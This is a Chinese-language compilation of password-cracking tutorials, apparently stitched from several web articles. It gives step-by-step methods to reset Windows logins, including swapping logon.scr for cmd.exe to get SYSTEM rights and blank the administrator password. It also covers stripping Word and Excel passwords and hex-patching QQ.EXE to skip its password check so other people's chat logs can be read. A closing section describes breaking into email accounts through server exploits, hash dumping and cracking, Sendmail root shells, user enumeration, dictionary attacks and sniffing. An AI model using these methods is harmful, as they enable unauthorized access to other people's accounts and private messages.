在此笔者向大家推荐一款可在DOS下清除Windows 2000/XP/2003的用户密码的免费软件——Acti ve@PasswordChanger（下载地址：http://qkdown.com/Software/Catalog 90/358.html）。下面介绍该软件的使用方法。

1.软件下载解压后会出现一个仅为27KB的。exe执行文件。进入DOS环境运行dospass，在“Your choince：[ ]”中输入“1”（选择逻辑磁盘），按Enter键后，会出现显示你的电脑硬盘分区表窗口，此时你仍然继续按Enter键，会出现已检测到磁盘MS SAM Database文件窗口。再继续按Enter键，出现如图所示的窗口。

从图中我们可以看到，系统中的用户会全部显示出来，在“Your choince：[ ]”中输入“0”后按Enter键（如果你的系统管理员用户名称不是Administrator，而是其他名称的话，只要输入其名称前的序列号即可）。

2.在出现“Would you like to Rest this User‘s password？ （Y，N）[N] ： [ ]”提示后，你输入“Y”后按Enter键，稍等一会儿就出现“Password has been successfully reset. （Press any key„）”提示，说明密码破解成功。重新启动计算机即可直接登录系统了。

无密码登陆WinXP或者Win2000

忘记Windows系统中用户或者本地管理员的密码一个经常性的问题，如果你按照下面技巧重的方法去做，步需要记住Windows系统的密码。

1.输入“regedit”来打开注册表;

2.进入HKEY_USERS --> Default --> Control Panel --> Desktop

3.把“ScreenSaveTimeOut”设置成15，“SCRNSAVE.EXE”设置成"CMD.EXE;

如大家所知，Windows系统正常的登陆界面仅仅是一个屏保。如上设置改变登陆界面成为命令提示符，这个提示符在最初的登陆屏保的时候将会显示15秒钟，在经过以上设置后，在c:windowssystem32中将存在一个命令提示符，登陆界面也将出现。当你更新这些设置以后，你在系统将不需要登陆密码。

按照以下步骤进行操作，就可以修改任何用户的密码，甚至包括本地管理员的。

在命令提示符中输入“mmc lusrmgr.msc”这将打开用户管理平台，这样就可以为任何用户重置密码了。

用ERD轻松修改系统登录密码

在机房管理过程中，我们经常会碰到因一时疏忽而忘记了系统超级管理员密码的情况。由于事前没有制作密码重设盘，等发现遗忘密码无法登录时，便后悔莫及。计算机系统分区中没有什么重要资料还好说，花上几个小时把系统分区格式化后重新安装一遍即可；但如果系统分区内留有重要资料或者服务器系统配置较为复杂，用这种笨办法就不行了。

如何才能在不重装系统的情况下修改系统登录密码呢？只要您通过搜索引擎查一下，就可以找到许多方法。这些方法概括起来大致有以下几种：

1. 用系统内置的Administrator系统超级用户登录。在默认情况下，Administrator账号的密码是空的。因此，我们可在“带命令行的安全模式”下，以系统超级用户Administrator的身份进入系统，然后用“Net User”命令强制更改用户密码或新建用户账号。也可在出现经典登录界面要求输入用户名和密码时，输入Administrator账号，再用空密码进入系统(在Windows XP中如不出现经典登录界面，可按住Ctrl+Alt后连按两下Del键即可)。用这种方法登录系统后，我们就可以删除或新建用户

账号了。

然而，这种方法只能对付系统本来就没有给默认的Administrator账号设置密码的情况。要是原系统中已经给它设置了密码，则根本无法用这种方法登录系统，更不要说用“Net user”了。

2. 删除系统文件夹System32\Config下的SAM文件。这种方法只在Windows 2000中有效，要是用来对付Windows XP和Windows 2003，则会在启动系统时出现“安全账户初始化失败”的提示，使整个系统无法使用。

3. 在DOS状态下，将系统文件夹System32下的logon.scr改成其他名称，再将cmd.exe改成logon.scr后重新启动系统。等上10 分钟后，系统会将改了名的cmd.exe文件当作屏幕保护程序自动运行，这样便进入DOS界面。这时，我们就可用net user命令给系统添加用户或更改密码了。但实际上，在Windows XP SP1(SP2)和Windows 2003中，用这种方法进入后，不再像前几个版本一样具有系统超级用户Administrator权限。当用Net user添加用户时，系统会提示“发生系统错误。拒绝访问”，让你根本无法添加用户。

4. 用WindowsKey、DreamPackPL等软件更改系统登录密码。但这些软件不是找不到有效的注册码，就是界面不够友善，操作步骤也太复杂。对于一般用户而言，面对一串串英文往往会不知所措。

那么，有没有更好的方法来轻松修改系统登录密码呢？答案是肯定的。ERD Commander 2003就是一款可以轻松修改系统管理员密码的傻瓜化软件，而且这款软件对Windows 2000/XP/2003各种版本的系统均有效。

下面就具体介绍一下这款软件的用法。

1. 下载ERD Commander 2003。下载完成后先将 “WinPE+ERD2003.rar”文件的扩展名更改为“.Iso”，然后用刻录机将此ISO镜像刻录成CD。

2. 用此CD启动电脑，进入ERD Commander 2003启动界面。在启动过程中， ERD 2003可能会让用户针对系统硬件配置进行一些选择。由于我们的目的只是借它来修改密码，所以一路选“是”即可。

3. 接下来，ERD 2003会在你的硬盘里搜索所有已安装的系统，搜索完毕后让你选择要修改登录密码的系统所在目录，选择好后按[确定]便可进入ERD 2003桌面。

4. ERD 2003的界面与Windows XP类似。单击任务栏上的[开始]按钮，选择“管理工具→密码修改”命令，即弹出“ERD Commander 2003 Locksmith Wizard”欢迎页。点击“Next”，出现了修改系统登录密码的对话框。在对话框中先选择一个用户名，然后在下面的密码框中输入你要设置的密码。完成后再点击[Next]，系统提示“密码修改成功，请重新启动计算机测试新密码”。点击[Finish]之后按提示重启系统，这时用你修改的密码就可登录对应的账户了。

用这种方法修改忘记了的系统登录密码，是不是太简单了？只要有了ERD Commander 2003，你就有了一把登录Windows系统的万能钥匙。

破解Word与Excel的文档密码

经常和办公软件打交道的人肯定知道，如果把加密文档的密码忘了就相当于将这个文件报废了,那将会是一件多么可怕的事情。但人类是万能的，今天就为大家介绍一款软件，可以松破解Word和Excel密码，解您后顾之忧。这个工具就是Office Password Remover。

它可以在很短的时间内破解Word和Excel文档的密码，经过测试最多不超过5秒。使用本软件时需要连接到Internet，因为要给该软件的服务器发送数据并解密。不过大家可以放心，本软件不会泄露任何个人隐私。

使用方法：

首先运行解压好的OPRemove.exe 这个程序，打开程序后可以看到中间文本框后面有个类似文件夹的按钮。

点击它浏览打开要破解的文档。

选择后出现下图的画面，点击移除密码。

呆几秒钟后便出现“该文档已经被成功破解”，点确定即可，这时候就大功告成了。

在这里要注意的是，破解后的文章名字会有点变化，加了“DEMO”这四个字母，翻译过来就是示范的意思，不必在意，重命名去掉就可以了。

另外，为了防止别人用该软件，也可以给它设置密码，打开软件后，点文件 — 设置访问密码，输两遍就OK了。下次运行时就出现提示要求输入运行程序的密码。

软件名称：http://www.hackol.com/Software/Catalog62/1323.html 打造QQ密码破解器

现在使用QQ的网友越来越多了。可是如果密码忘记了或嫌输入QQ密码过于麻烦，那怎么办呢。我们可以自己制作一款QQ密码器。如果你感兴趣的话。可以和我一起自己动手做一个这样的QQ密码破解器。

首先，介绍一下我们要用到的工具软件——Keymake。Keymake是中文界面的国产软件，它是一款可以很方便的制作出自己的“注册机”或软件补丁的软件。之所以给“注册机”加上了引号，是因为严格说来，用Keymake来制作

的“注册机”并不是真正的注册机，只能算做是软件的补丁或另类注册机（用Keymake制作的“注册机”在运行后，可以让注册码自己跳出来，直接显示在屏幕上）。

QQ密码破解软件

目前有许多程序的注册码算法都与硬件有关，这类程序在每一台机上安装时都会生成一个机器码，要把这个机器码E-MAIL给作者，待他收到机器码后，再算出注册码寄回给用户，一机一码的结果就是软件只能一机一用。

本来这样无可厚非，但是有些时候，这样做给用户却造成了不少的麻烦，因为只要用户重装系统或升级更换硬件，就要重新去注册软件。对于这种程序，一般人只能在内存中找到自己机器的注册码，但这种注册码到了其它的机器上又不能用了，而自己又没有办法写出注册机来，为了解决这方面的问题，作者写了这个小软件，它可以从另一进程中取出注册码，并在屏幕中显示出来，并且不需要你去了解待注册程序的算法也不需要你会编程，是不是很方便呀？

今天我们就利用它的制作补丁功能制作出QQ聊天补丁，突破QQ的本地密码验证，使得我们无需输入密码就可以进入QQ，实现自由查看QQ聊天记录的目的！ 下面正式开始。首先，请你下载16进制文件编辑器UltraEdit汉化版，用它来修改QQ的主文件，改造出一个可以无需密码就能登陆的QQ，安装完毕之后，单击桌面上的UltraEdit图标运行它，然后点击“文件”菜单中的“打开”，找到QQ安装目录下的QQ.EXE，点击“确定”打开该文件。

然后点击“搜索”菜单下的“查找”，在出现的对话框的“查找什么”栏中填入：

F[1**********]37D1801，这些代码中的“0F8499000000”就是判定你输入的密码是否和真正的QQ密码是否相等的汇编代码的机器码。

把“QQ密码破解器”拿到朋友家去炫耀一番，运行它试试， 看，界面中有你的大名和使用说明。

点击“浏览”按钮找到待打补丁的QQ.EXE文件，单击“应用”按钮即可。然后再运行QQ试试，怎么样在登陆时无需输入密码了吧？对于任何号码都如此，哈哈，大功告成！保管你的朋友佩服得五体投地，一个劲地询问你是怎么做的。你还可以把该文件放到网上，让更多的人体验你的智慧和创意，快试试吧！

QQ密码破解工具

强力破解E-mail密码三种方法

电子邮件并不是安全的，在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节，恶意用户如果利用其漏洞，就能够轻易的破解出账号，获得邮件内容。

一、利用邮件服务器操作系统的漏洞

邮件服务器软件是运行在特定的操作系统上的，如Linux、

Windows NT/2000等。这些操作系统的默认安装和配置都是不安全的，黑客可以轻易入侵系统，获得所有用户名和密码。

1 Windows服务器

如果是基于Windows2000的Exchange Mail Server，系统本身未做任何安全配置，开放了若干服务。入侵者可以利用终端服务器结合中文输入法漏洞或者IIS的Buffer Overflow程序获得Administrator权限，用pwduMP3导出Hash过的密码，再用L0pht挂接字典或者Brute Force就能破解出用户密码。根据经验，如果密码简单，几分钟之内就能破解出，长度在8位及以下的用Brute Force方式在一天内就能解出。

2 Linux/UNIX服务器

UNIX类系统一般采用Sendmail作为邮件系统，在获得了系统的控制权之后，用John等软件就能从/etc/passwd或者/etc/shadow中破解出密码。如果采用了数据库方式来保存用户信息和密码，也是很容易被导出。

二、利用邮件服务器软件本身的漏洞

最常见的邮件服务器程序有Sendmail，Qmail等，在不同程度在都存在安全缺陷。以Sendmail为例，再以前的老版本中，telnet到25端口，输入wiz，然后接着输入shell，就能获得一个rootshell，还有debug命令，也能获得root权限。Qmail相对Sendmail安全，但是Qpoper存在Buffer Overflow缺陷，能够远程得到rootshell，进而控制系统。

即使邮件服务器是安全的，但是入侵者还能获得更多的信息，比如用户名。telnet到25端口，输入expn tom或者vrfy tom就能查询系统是否有tom用户。最新版本的Sendmail虽然禁用了这两个命令，但是可以通过伪造发信人然后用rcpt to来判断该用户是否存在。

得到了用户名，可以telnet到110端口，尝试简单密码的连接，或者套用字典破解。

所以，必须禁止非本域的中继利用(relay)，或者采用现在很多ISP都采用的给SMTP加上发信认证的模块，这样能够增强邮件服务器的安全。 除了POP3方式收信之外，比较流行的是在WEB界面上处理邮件。这种方式也不无弱点，一般是通过CGI来接受用户传递的表单form参数，包括username和password，如果正确，就可以进入处理邮件的页面。破解已知用户的密码，有很多套用字典或者暴力组合的软件可用，比较著名的是小榕的《溯雪》，在密码简单的情况下，很快就有结果。

WEB邮件系统都有“忘记密码”的选项，如果能破解寄回密码的另外一个邮箱或者猜出提示问题的答案，也能成功。

三、在邮件的传输过程中窃听

在网络中安装Sniffer，指定监听往外部服务器110端口发送的数据包，从收集下来的信息中查看user和pass后的字符串就能看到用户名和相应的

密码。

用屏保替换法清除WIN2000/WINXP登陆密码

就是把%systemroot%\system32\logon.scr替换为cmd.exe或者explorer.exe，然后在系统登陆处等待，过一会，系统就会去运行logon.scr这个屏保，因为你替换了这个屏保文件，所以实际上运行的是cmd.exe或者explorer.exe，并且是localsystem权限，于是你可以随便了，最简单的就是在cmd.exe里运行netuseradministrator""，成功后管理员密码也被清空了，关闭cmd或者explorer就可以用空口令登陆了。